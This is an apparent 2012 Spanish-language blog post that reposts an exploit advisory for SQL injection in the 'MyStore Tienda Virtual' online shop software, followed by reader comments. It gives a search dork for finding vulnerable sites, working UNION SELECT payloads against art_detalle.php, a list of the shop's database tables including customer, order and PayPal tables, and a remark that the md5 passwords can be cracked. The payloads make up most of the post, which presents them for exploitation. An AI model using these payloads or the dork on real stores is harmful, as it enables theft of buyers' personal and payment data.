SQL Injection MyStore Tienda Virtual

El dia de ayer decidi hacer publica una vulnerabilidad en un sistema de ventas online, solo puse uno de los varios links , ya que el sistema sufre de varios sql, como xss, lo peor de esta vulnerabilidad es que revela absolutamente todos los datos de los compradores.

Informacion no segura

para explotar es lo siguiente:

========================================================================================
| # Title : SQL Injection MyStore Tienda Virtual |
| # Author : Arturo Zamora |
| # email : [email protected] |
| # DAte : 02/01/2012 |
| # Verified : yes |
| # Risk : High |
| # Published: |
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |
| # Dork : inurl:art_detalle.php?id= |
====================== zeux0r 2012 =================================
Exploit :
======================

http://localhost/path/art_detalle.php?id={sqli}

======================
Example:
======================

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

======================
dbs:
======================
articulos
articulos_nivel3
articulos_relacionados
articulos_secciones
atajada
atajadausa
ayuda
ayudausa
banners
banners_conteo
banners_lateral
banners_lateralusa
basket
campania
clientesclientes_envio
clientes_facturacion
colores
comentario
comisionistas
comisionistas_hits
comisionistas_modulos
contacto
descuentos
descuentos_cruzados
descuentos_temp
especificacion
home
homeusa
justin
justinusa
mensajeria
mensajeriausa
mixer
newsletter
newsletter_mensaje
nivel1
nivel2
nivel3
parametros
paypal
pedidos
pedidos_detalle
pedidos_detalleusa
pedidosusa
remate
remateusa
secciones
shopper
sol_info
talisman
tallas
ticker
tickerusa
visitas

======================
Information :
======================

password decrypt md5

======================

I Love U Pumosita

www.insecure.org.mx

================================ Mexican shotos ========================================
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *
-------------------------------------------------------------------------------------------
mirror:http://www.exploit-db.com/exploits/18302/
SQL Injection MyStore Tienda Virtual
Etiquetado en:     

7 pensamientos en “SQL Injection MyStore Tienda Virtual

  • 3 enero, 2012 a las 10:39 AM
    Permalink

    Nice disclosure Zeux0r… eso nos anima a seguirle buscando, que siempre hay errores en todo… ch33rs!

    Responder
  • 9 enero, 2012 a las 3:31 PM
    Permalink

    gracias por la info, se puede saber como se llama el programa que esta en el screenshot?
    gracias

    Responder
      • 13 enero, 2012 a las 1:15 PM
        Permalink

        muchas gracias! si no es mucha molestia, igual quisiera saber si hay programas similar pero para XSS?

        Responder
  • 17 enero, 2012 a las 11:21 AM
    Permalink

    Que tal una pregunta como puedo pertencer al team o grupo de Mexican Shtos XDDD

    saludos XD

    Responder

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *